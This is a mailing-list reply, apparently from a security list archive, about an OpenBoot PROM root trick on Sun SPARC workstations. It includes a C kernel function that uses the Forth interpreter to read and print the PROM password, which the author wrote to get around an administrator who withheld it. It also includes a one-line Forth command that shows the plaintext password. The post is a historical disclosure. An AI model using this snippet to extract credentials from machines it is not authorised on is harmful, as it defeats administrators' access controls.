Re: Regarding Mudge's OBP/FORTH root hack (PHRACK53)

[leendert () WATSON IBM COM (Leendert van Doorn)]

# Jericho Nunn wrote:
#
# >    Aside from the fact that it left me quite flabbergasted for quite
# >some time, mudge's OBP memory manipulation for aquiring root priviledges
# >poses a serious risk for environments where SUN workstation consoles are
# >easily accesible to unpriviledged individuals, such as university labs.
#
# This has been known for a long time. Indeed some 7 years ago whilst I
# was at univeristy, and in my more "cat and mouse" gaming moods, I used
# this trick and a prom password was promptly added.

Given that we are on the subject of open boot prom passwords. Because of
a disagreement with the person that managed the pool of Sparc stations
we ran Amoeba on (he didn't want to give me the prom password but I was
allowed to boot my own kernels), my own kernels contained the following
piece of code:

#ifndef NDEBUG
/*
 * Print the prom password so I know what it is when debugging a kernel
 */
void
print_password(void)
{
    char cmd[OBP_CMDLEN], pwd[8];
    int i, pwdlen;

    preprom();
    if (obp->op_interpret) {
        (void) sprintf(cmd,
            "security-password %x swap dup %x ! move", pwd, &pwdlen);
        obp->op_interpret(cmd);
        if (pwdlen > 0) {
            printf("OBP Password = '");
            for (i = 0; i < pwdlen; i++)
                printf("%c", pwd[i]);
            printf("'\n");
        }
    }
    postprom();
}
#endif /* NDEBUG */

Yes, the prom password is unencrypted. "security-password dump" will
show the plaintext version.

        Leendert

--
Leendert van Doorn                                    <leendert () watson ibm com>
IBM T.J. Watson Research Center                       (914) 784-7831
30 Saw Mill River Road, Hawthorne, NY 10532